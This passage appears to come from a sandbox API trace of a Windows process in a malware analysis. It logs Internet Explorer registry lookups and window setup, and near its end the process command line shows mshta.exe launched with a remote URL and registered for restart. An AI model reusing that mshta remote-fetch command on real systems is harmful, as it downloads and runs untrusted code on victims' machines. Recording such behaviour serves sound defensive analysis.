Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b4 | out: phkResult=0x40f1b4*=0x0) returned 0x2 [0026.202] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x74) returned 0x0 [0026.202] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.263] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.285] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.285] RegCloseKey (hKey=0x0) returned 0x6 [0026.285] RegCloseKey (hKey=0x0) returned 0x6 [0026.285] RegCloseKey (hKey=0x74) returned 0x0 [0026.285] RegCloseKey (hKey=0x78) returned 0x0 [0026.285] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.285] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x74) returned 0x0 [0026.286] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.286] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 
0x2 [0026.286] RegCloseKey (hKey=0x0) returned 0x6 [0026.286] RegCloseKey (hKey=0x0) returned 0x6 [0026.286] RegCloseKey (hKey=0x78) returned 0x0 [0026.286] RegCloseKey (hKey=0x74) returned 0x0 [0026.286] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x74) returned 0x0 [0026.286] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.286] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.286] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_ARIA_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.286] RegCloseKey (hKey=0x0) returned 0x6 [0026.286] RegCloseKey (hKey=0x0) returned 0x6 [0026.286] RegCloseKey (hKey=0x74) returned 0x0 [0026.286] RegCloseKey (hKey=0x78) returned 0x0 [0026.286] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.287] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x74) returned 0x0 [0026.287] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.287] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_LEGACY_DISPPARAMS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x7c) returned 0x0 [0026.287] SHRegGetValueW () returned 0x2 [0026.287] 
SHRegGetValueW () returned 0x2 [0026.287] RegCloseKey (hKey=0x7c) returned 0x0 [0026.287] RegCloseKey (hKey=0x0) returned 0x6 [0026.287] RegCloseKey (hKey=0x0) returned 0x6 [0026.287] RegCloseKey (hKey=0x78) returned 0x0 [0026.287] RegCloseKey (hKey=0x74) returned 0x0 [0026.287] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x74) returned 0x0 [0026.287] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.287] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.287] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_PRIVATE_FONT_SETTING", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.287] RegCloseKey (hKey=0x0) returned 0x6 [0026.287] RegCloseKey (hKey=0x0) returned 0x6 [0026.287] RegCloseKey (hKey=0x74) returned 0x0 [0026.288] RegCloseKey (hKey=0x78) returned 0x0 [0026.288] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.288] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x74) returned 0x0 [0026.288] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.288] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CSS_SHOW_HIDE_EVENTS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: 
phkResult=0x40f16c*=0x0) returned 0x2 [0026.288] RegCloseKey (hKey=0x0) returned 0x6 [0026.288] RegCloseKey (hKey=0x0) returned 0x6 [0026.288] RegCloseKey (hKey=0x78) returned 0x0 [0026.288] RegCloseKey (hKey=0x74) returned 0x0 [0026.288] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x74) returned 0x0 [0026.288] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.288] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.288] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_DISPLAY_NODE_ADVISE_KB833311", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.288] RegCloseKey (hKey=0x0) returned 0x6 [0026.288] RegCloseKey (hKey=0x0) returned 0x6 [0026.288] RegCloseKey (hKey=0x74) returned 0x0 [0026.289] RegCloseKey (hKey=0x78) returned 0x0 [0026.289] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.289] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x74) returned 0x0 [0026.289] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.289] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ALLOW_EXPANDURI_BYPASS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) 
returned 0x2 [0026.289] RegCloseKey (hKey=0x0) returned 0x6 [0026.289] RegCloseKey (hKey=0x0) returned 0x6 [0026.289] RegCloseKey (hKey=0x78) returned 0x0 [0026.289] RegCloseKey (hKey=0x74) returned 0x0 [0026.289] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x74) returned 0x0 [0026.289] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.289] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.289] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.289] RegCloseKey (hKey=0x0) returned 0x6 [0026.289] RegCloseKey (hKey=0x0) returned 0x6 [0026.289] RegCloseKey (hKey=0x74) returned 0x0 [0026.290] RegCloseKey (hKey=0x78) returned 0x0 [0026.290] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.290] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x74) returned 0x0 [0026.290] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.290] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_DATABINDING_SUPPORT", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 
[0026.290] RegCloseKey (hKey=0x0) returned 0x6 [0026.290] RegCloseKey (hKey=0x0) returned 0x6 [0026.290] RegCloseKey (hKey=0x78) returned 0x0 [0026.290] RegCloseKey (hKey=0x74) returned 0x0 [0026.290] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x74) returned 0x0 [0026.290] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.290] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.290] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_ENFORCE_BSTR", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.290] RegCloseKey (hKey=0x0) returned 0x6 [0026.290] RegCloseKey (hKey=0x0) returned 0x6 [0026.290] RegCloseKey (hKey=0x74) returned 0x0 [0026.291] RegCloseKey (hKey=0x78) returned 0x0 [0026.291] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.291] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x74) returned 0x0 [0026.291] RegOpenKeyExW (in: hKey=0x74, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.291] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.291] RegCloseKey (hKey=0x0) returned 
0x6 [0026.291] RegCloseKey (hKey=0x0) returned 0x6 [0026.291] RegCloseKey (hKey=0x78) returned 0x0 [0026.291] RegCloseKey (hKey=0x74) returned 0x0 [0026.291] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0026.292] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.292] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x7c) returned 0x0 [0026.292] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.292] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.292] RegCloseKey (hKey=0x0) returned 0x6 [0026.292] RegCloseKey (hKey=0x0) returned 0x6 [0026.292] RegCloseKey (hKey=0x78) returned 0x0 [0026.293] RegCloseKey (hKey=0x7c) returned 0x0 [0026.293] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x7c) returned 0x0 [0026.293] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x78) returned 0x0 [0026.293] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.293] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS", ulOptions=0x0, samDesired=0x1, 
phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.293] RegCloseKey (hKey=0x0) returned 0x6 [0026.293] RegCloseKey (hKey=0x0) returned 0x6 [0026.293] RegCloseKey (hKey=0x7c) returned 0x0 [0026.293] RegCloseKey (hKey=0x78) returned 0x0 [0026.293] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1ac | out: phkResult=0x40f1ac*=0x78) returned 0x0 [0026.293] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b0 | out: phkResult=0x40f1b0*=0x7c) returned 0x0 [0026.293] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.293] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454", ulOptions=0x0, samDesired=0x1, phkResult=0x40f16c | out: phkResult=0x40f16c*=0x0) returned 0x2 [0026.293] RegCloseKey (hKey=0x0) returned 0x6 [0026.293] RegCloseKey (hKey=0x0) returned 0x6 [0026.293] RegCloseKey (hKey=0x78) returned 0x0 [0026.293] RegCloseKey (hKey=0x7c) returned 0x0 [0026.294] GetSystemMetrics (nIndex=68) returned 4 [0026.294] GetSystemMetrics (nIndex=69) returned 4 [0026.294] GetProfileIntA (lpAppName="windows", lpKeyName="DragDelay", nDefault=20) returned 0x14 [0026.294] GetSystemDefaultLCID () returned 0x409 [0026.294] GetVersionExW (in: lpVersionInformation=0x40f110*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x76fa2fe7, dwMinorVersion=0x76fa2e82, dwBuildNumber=0x6368afd8, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x40f110*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0026.294] GetUserDefaultUILanguage () returned 0x409 [0026.294] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x58, lpLCData=0x40f060, cchData=16 | out: lpLCData="\x03") returned 16 [0026.295] GetKeyboardLayoutList (in: nBuff=32, lpList=0x40f090 | out: lpList=0x40f090) returned 1 [0026.295] GetSystemMetrics (nIndex=4096) returned 0 [0026.295] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b4 | out: phkResult=0x40f1b4*=0x7c) returned 0x0 [0026.295] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x40f1b8 | out: phkResult=0x40f1b8*=0x78) returned 0x0 [0026.295] RegOpenKeyExW (in: hKey=0x78, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f174 | out: phkResult=0x40f174*=0x0) returned 0x2 [0026.295] RegOpenKeyExW (in: hKey=0x7c, lpSubKey="FEATURE_CLEANUP_AT_FLS", ulOptions=0x0, samDesired=0x1, phkResult=0x40f174 | out: phkResult=0x40f174*=0x0) returned 0x2 [0026.295] RegCloseKey (hKey=0x0) returned 0x6 [0026.295] RegCloseKey (hKey=0x0) returned 0x6 [0026.295] RegCloseKey (hKey=0x7c) returned 0x0 [0026.295] RegCloseKey (hKey=0x78) returned 0x0 [0026.295] GetModuleFileNameW (in: hModule=0x63150000, lpFilename=0x40f01c, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\mshtml.dll" (normalized: "c:\\windows\\system32\\mshtml.dll")) returned 0x1e [0026.296] RegisterClipboardFormatA (lpszFormat="Embedded Object") returned 0xc00a [0026.296] RegisterClipboardFormatA (lpszFormat="Embed Source") returned 0xc00b [0026.296] RegisterClipboardFormatA (lpszFormat="Link Source") returned 0xc00d [0026.296] RegisterClipboardFormatA (lpszFormat="Link Source Descriptor") returned 0xc00f [0026.296] RegisterClipboardFormatA (lpszFormat="Object Descriptor") returned 0xc00e [0026.296] RegisterClipboardFormatA (lpszFormat="MS Forms CLSID") returned 0xc198 [0026.296] RegisterClipboardFormatA (lpszFormat="MS Forms Text") returned 0xc199 
[0026.296] GetDC (hWnd=0x0) returned 0x120108b4 [0026.296] SHCreateShellPalette (hdc=0x0) returned 0x120807e9 [0026.296] GetPaletteEntries (in: hpal=0x120807e9, iStart=0x0, cEntries=0x100, pPalEntries=0x6368a494 | out: pPalEntries=0x6368a494) returned 0x100 [0026.296] SHGetInverseCMAP (in: pbMap=0x63688a7c, cbMap=0x4 | out: pbMap=0x63688a7c) returned 0x0 [0026.296] GetDeviceCaps (hdc=0x120108b4, index=38) returned 32409 [0026.296] ReleaseDC (hWnd=0x0, hDC=0x120108b4) returned 1 [0026.297] GetCurrentProcessId () returned 0xa18 [0026.297] _vsnprintf (in: _DstBuf=0x40f560, _MaxCount=0x16, _Format="%s%08lX", _ArgList=0x40f228 | out: _DstBuf="#MSHTML#PERF#00000A18") returned 21 [0026.297] OpenFileMappingA (dwDesiredAccess=0x2, bInheritHandle=0, lpName="#MSHTML#PERF#00000A18") returned 0x0 [0026.297] GetVersionExW (in: lpVersionInformation=0x40f244*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x40f2b0, dwMinorVersion=0x7553090d, dwBuildNumber=0x1d9, dwPlatformId=0x40f200, szCSDVersion="⡸\x0f⒨Y줠\x10⿠Y㌟盆") | out: lpVersionInformation=0x40f244*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0026.297] GetModuleHandleW (lpModuleName="advapi32") returned 0x754d0000 [0026.297] GetProcAddress (hModule=0x754d0000, lpProcName="EventWrite") returned 0x76f7d59a [0026.297] GetProcAddress (hModule=0x754d0000, lpProcName="EventRegister") returned 0x76fb5b0c [0026.297] GetProcAddress (hModule=0x754d0000, lpProcName="EventUnregister") returned 0x76fad9dd [0026.297] EtwEventRegister () returned 0x0 [0026.298] EtwRegisterTraceGuidsW () returned 0x0 [0026.298] EtwRegisterTraceGuidsW () returned 0x0 [0026.298] EtwEventRegister () returned 0x0 [0026.301] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files\\Microsoft Office\\Office15\\outllib.dll", lpdwHandle=0x40f010 | out: lpdwHandle=0x40f010) returned 0x0 [0026.301] GetModuleHandleW (lpModuleName=0x0) returned 0x2b0000 [0026.302] 
GetModuleFileNameW (in: hModule=0x2b0000, lpFilename=0x40f01c, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\mShta.exe" (normalized: "c:\\windows\\system32\\mshta.exe")) returned 0x1d [0026.302] PathFindFileNameW (pszPath="C:\\Windows\\system32\\mShta.exe") returned="mShta.exe" [0026.303] GetCurrentProcessId () returned 0xa18 [0026.303] GetCurrentProcessId () returned 0xa18 [0026.305] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Local\\!PrivacIE!SharedMemory!Mutex") returned 0x98 [0026.305] GetLastError () returned 0x0 [0026.311] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10, lpName="Local\\!PrivacIE!SharedMem!Counter") returned 0xdc [0026.311] MapViewOfFile (hFileMappingObject=0xdc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x200000 [0026.312] RegCloseKey (hKey=0x26) returned 0x0 [0026.312] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c10000 [0026.312] GetProcAddress (hModule=0x76c10000, lpProcName="RegisterApplicationRestart") returned 0x76c43665 [0026.312] lstrlenA (lpString="http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC") returned 41 [0026.312] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf1d26, cbMultiByte=-1, lpWideCharStr=0x550e78, cchWideChar=42 | out: lpWideCharStr="http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC") returned 42 [0026.312] RegisterApplicationRestart (pwzCommandline="http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC", dwFlags=0x0) returned 0x0 [0026.313] GetProcAddress (hModule=0x63150000, lpProcName="RunHTMLApplication") returned 0x631ae710 [0026.328] GetCommandLineW () returned="mShta http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC" [0026.373] OleInitialize (pvReserved=0x0) returned 0x0 [0026.523] IsWindow (hWnd=0x0) returned 0 [0026.523] RegisterClassW (lpWndClass=0x40f8c4) returned 0xc19a [0026.523] CreateWindowExW (dwExStyle=0x0, 
lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x2b0000, lpParam=0x63689680) returned 0x101fc [0026.523] DefWindowProcW (hWnd=0x101fc, Msg=0x24, wParam=0x0, lParam=0x40f500) returned 0x0 [0026.523] DefWindowProcW (hWnd=0x101fc, Msg=0x81, wParam=0x0, lParam=0x40f4ac) returned 0x1 [0026.524] DefWindowProcW (hWnd=0x101fc, Msg=0x83, wParam=0x0, lParam=0x40f520) returned 0x0 [0026.526] DefWindowProcW (hWnd=0x101fc, Msg=0x1, wParam=0x0, lParam=0x40f4a4) returned 0x0 [0026.526] CreateWindowExW (dwExStyle=0x40000, lpClassName="HTML Application Host Window Class", lpWindowName="", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x101fc, hMenu=0x0, hInstance=0x2b0000, lpParam=0x63689680) returned 0x10200 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0x24, wParam=0x0, lParam=0x40f500) returned 0x0 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0x81, wParam=0x0, lParam=0x40f4ac) returned 0x1 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0x83, wParam=0x0, lParam=0x40f520) returned 0x0 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0x1, wParam=0x0, lParam=0x40f4a4) returned 0x0 [0026.526] SetWindowLongW (hWnd=0x10200, nIndex=-16, dwNewLong=-2100363264) returned 114229248 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0x7c, wParam=0xfffffff0, lParam=0x40f894) returned 0x0 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0x7d, wParam=0xfffffff0, lParam=0x40f894) returned 0x0 [0026.526] DefWindowProcW (hWnd=0x10200, Msg=0xd, wParam=0x104, lParam=0x22c5e0) returned 0x0 [0026.527] DefWindowProcW (hWnd=0x10200, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0026.527] DefWindowProcW (hWnd=0x10200, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0026.527] DefWindowProcW (hWnd=0x10200, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0026.527] SetWindowPos (hWnd=0x10200, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 
[0026.527] DefWindowProcW (hWnd=0x10200, Msg=0x46, wParam=0x0, lParam=0x40f8ac) returned 0x0 [0026.527] DefWindowProcW (hWnd=0x10200, Msg=0x83, wParam=0x1, lParam=0x40f880) returned 0x0 [0026.527] DefWindowProcW (hWnd=0x10200, Msg=0x47, wParam=0x0, lParam=0x40f8ac) returned 0x0 [0026.527] DefWindowProcW (hWnd=0x10200, Msg=0xd, wParam=0x104, lParam=0x22c5e0) returned 0x0 [0026.528] DefWindowProcW (hWnd=0x10200, Msg=0x83, wParam=0x1, lParam=0x40f4a8) returned 0x0 [0026.528] SendMessageW (hWnd=0x10200, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0026.528] DefWindowProcW (hWnd=0x10200, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0026.528] DefWindowProcW (hWnd=0x10200, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0026.545] PathRemoveArgsW (in: pszPath="http://doc2th.com/tin/foobaz.txt &AAAA\x12\x0cC" | out: 